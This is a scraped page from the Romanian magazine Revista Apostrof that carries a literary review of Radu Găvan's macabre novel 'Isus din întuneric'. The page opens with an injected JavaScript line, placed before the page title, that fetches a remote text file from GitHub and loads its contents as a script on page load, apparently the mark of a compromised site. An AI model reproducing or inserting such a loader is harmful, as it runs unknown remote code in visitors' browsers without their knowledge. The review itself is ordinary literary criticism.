;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Revista Apostrof | OLIVIU CRÂZNIC: ARTISTUL, DEMONII ŞI NEBUNIA
 

OLIVIU CRÂZNIC: ARTISTUL, DEMONII ŞI NEBUNIA

Radu Găvan (n. 1978) este romancier (Exorcizat, Ed. Herg Benet, 2014; Neverland, Ed. Herg Benet, 2015; Diavoli fragili, Ed. Pandora M – Grupul editorial TREI, 2017; Neverland, Pop Verlag Ludwigsburg, 2018) premiat (inclusiv cu Premiul „Mircea Ciobanu“ – a se vedea Premiile USR pe anul 2014, www.uniuneascriitorilor.ro) şi poet (Bestia obişnuinţei, Ed. Herg Benet, 2019).

Cel mai recent volum al său, Isus din întuneric (Ed. Litera, 2021 – colecţia Biblioteca de proză contemporană, coordonată de D. Ruşti) aparţine stilului funcţional beletristic, curentului literar postmodernist (cu vădite accente expresioniste şi suprarealiste), categoriilor estetice a macabrului şi, respectiv, a fantasticului, genului literar epic (încorporând şi pasaje cu caracter liric, respectiv didactic, asupra cărora vom reveni mai jos), speciei literare (din punct de vedere formal şi, respectiv, tematic) a romanului macabru, subspeciei literare a macabrului fantastic.

Ţinând cont de faptul că, în mod cert, personajul principal suferă de o boală psihică, am putea fi tentaţi să încadrăm opera în curentul literar al realismului halucinatoriu, excluzând, astfel, şi categoria estetică a fantasticului; însă explicaţia carteziană nu poate lămuri toate întâmplările narate, iar autorul însuşi pare a o sugera drept eronată ori, cel puţin, insuficientă, cu ocazia menţionării modului în care critica literară primeşte şi interpretează debutul editorial al unuia dintre personaje (de altfel, şi în Diavoli … – cu care Isus … are multe în comun –, R. Găvan utilizase aceeaşi tehnică amăgitoare a demitizării parţiale).

Din punct de vedere al literaturii comparate, Isus… ne poartă cu gândul spre creaţii precum Portretul lui Dorian Gray (The Picture of Dorian Gray; O. Wilde, 1890), Doctor Faustus. Viaţa compozitorului german Adrian Leverkühn povestită de un prieten (Doktor Faustus. Das Leben des deutschen Tonsetzers Adrian Leverkühn, erzählt von einem Freunde. Roman; Th. Mann, 1947), Falling Angel (W. Hjortsberg, 1978), Pământul de sub tălpile ei (The Ground Beneath Her Feet; S. Rushdie, 1999) ori Fată înecându-se: O autobiografie (The Drowning Girl: A Memoir; C.R. Kiernan, 2012).

Printre (alte) posibile influenţe, identificăm operele unor E.T.A. Hoffmann, G. Meyrink, J. Donoso, R. Bolaño, S. King, A. Pérez-Reverte şi, nu în ultimul rând, Al. Dumas (cei patru – sau trei, dacă unul dintre ei este, până la urmă, doar o altă personalitate a personajului principal, cum pare să rezulte la un moment dat – muzicieni-aventurieri creaţi de R. Găvan pot fi consideraţi reflexii postmoderne ale lui d`Artagnan, Athos, Porthos şi Aramis, impresarul lor jucând, într-o oarecare măsură, rolul tutelar al lui Tréville).

Subiectul se ramifică în trei planuri narative (dintre care cel puţin unul se desfăşoară strict la nivel psihic), fiecare dedicat unei arte şi jalonat cu numeroase biografii fictive, majoritatea interesante şi utile scopului urmărit de autor (printre acestea, este inclusă, foarte inspirat, şi biografia reală a ucigaşului în serie Jack Unterweger, adevărată „cautionary tale“: eliberat din închisoare sub presiunile elitei literare austriece, care l-a considerat reabilitat datorită scrierilor sale, a devenit faimos ca jurnalist şi dramaturg, ceea ce nu l-a împiedicat pe „reabilitatul reintegrat în societate“ să reia seria omorurilor, la doar câteva luni după eliberare). Credem, totuşi, că unele dintre aceste biografii, ataşate unor personaje secundare ori chiar episodice, ar fi fost preferabil să lipsească.

Planul narativ principal (închinat muzicii) se concentrează asupra tânărului lider al unei formaţii muzicale de „rock/metal“ numite „Jesus from Darkness“ – figură serafică, bântuită însă de un trecut malefic şi de moartea nefirească a multor apropiaţi. Prietenii şi colegii săi nu sunt nici ei feriţi de atingerea Răului – fie ca urmare a trecutului propriu, fie prin ricoşeu. Speranţa evitării unui destin monstruos se iveşte sub forma vieţii fericite alături de o soţie exemplară şi de un copil minunat – poate însă normalitatea să ţină piept nebuniei?…

Acest plan narativ (căruia îi sunt rezervate cele mai multe pagini) conţine şi o serie de remarcabile minicronici (poetice) vizând piese muzicale „rock/metal“ clasice, pasaje care elogiază muzica „blues“, precum şi reuşite poeme în proză, deghizate în creaţii ale lui „Isus din întuneric“.

Planul narativ secundar (dedicat literaturii) se concentrează asupra tatălui muzicianului damnat, el însuşi posibilă victimă a unui pact faustian care îl transformă în scriitor celebru (operele sale dovedesc neliniştitoare calităţi premonitorii), doar pentru a îi întuneca definitiv minţile, forţându-l astfel să se automutileze, să îşi ucidă soţia şi fetiţa, apoi să se sinucidă. Odată cu moartea sa, blestemul trece asupra fiului nelegitim, născut în circumstanţe misterioase şi imorale.

Planul narativ terţiar (hărăzit picturii) are în centru un pictor straniu (imaginar? infernal?), aparent iniţiatorul lanţului de evenimente tragice care îl leagă pe tatăl-scriitor de fiul-muzician, şi pe amândoi aceştia de celelalte personaje.

Pe parcursul fiecărui plan narativ, R. Găvan reia, analizează, aprofundează (cu migală şi cu talent) teme şi motive literare pe care i le ştim dragi din Diavoli … – corelându-le, în stilul deja cunoscut, cu probleme psiho-sociale ori filozofice: arta poetică, suferinţa ca sursă de inspiraţie, rolul terapeutic al literaturii, condiţia artistului în general şi a artistului de geniu în special, jertfa pentru creaţie, legătura indisolubilă (şi, nu de puţine ori, distructivă) dintre autor şi operă, ispitele succesului public, tragedia familiei disfuncţionale, traumele copilăriei şi influenţa decisivă a acestora asupra personalităţii (şi destinului) adultului, linia firavă dintre fantezie şi delir ş.a.m.d.

Complex din punct de vedere structural, cu personaje bine închegate şi cu o intrigă provocatoare (unul dintre atuurile scrierilor lui R. Găvan îl constituie interactivitatea, cititorul văzându-se nevoit să acorde o deosebită atenţie indiciilor presărate în text şi să îşi pună, în mod serios, mintea la contribuţie, pentru a le descoperi şi pentru a le înţelege semnificaţia), Isus … beneficiază şi de o scriitură bogată în figuri de stil, categoric capabilă să transmită cititorului emoţii puternice – chiar să îl bulverseze (ceea ce puţini scriitori români contemporani reuşesc, deşi nu puţini încearcă). Pe de altă parte, limbajul licenţios (tipic, este adevărat, curentului literar postmodernist) ar fi fost de dorit să lipească (sordidul putând fi evocat şi în moduri mai puţin directe, fără a i se diminua impactul emoţional); utilizarea timpului verbal al trecutului perfect compus (adecvată, admitem, pasajelor cu rezonanţă biografică ori de reportaj) ar fi fost necesar, considerăm, să alterneze cu aceea a timpului verbal al trecutului perfect simplu (dacă nu din alt motiv, măcar pentru a nu se repeta excesiv verbul auxiliar „a (avea)“ – pers. a III-a, sg.); în sfârşit, la subiectul neexprimat trebuie apelat mai rar, pentru a se evita confuziile referitoare la personajul care săvârşeşte/suferă acţiunea exprimată de predicatul verbal ori căreia i se atribuie o însuşire prin intermediul predicatului nominal.

Tomul este atent corectat şi foarte bine tehnoredactat. Coperta plastifiată lucios este ilustrată adecvat (ar fi fost, totuşi, indicată utilizarea imaginii sculpturii la care se face referire în intrigă: Michelangelo, Pietà, 1498–1499). Din păcate, hârtia pe care a fost tipărit volumul nu este una albă, de calitate superioară, rezistentă în timp, cum ar fi fost de dorit (neajuns care s-ar putea remedia cu prilejul viitoarei ediţii).

În concluzie, prin Isus …, R. Găvan îşi consolidează locul meritat (obţinut anterior) în literatura postmodernă macabră românească şi continuă să se adreseze unui public din ce în ce mai larg (din care, însă, nu recomandăm să facă parte firile sensibile).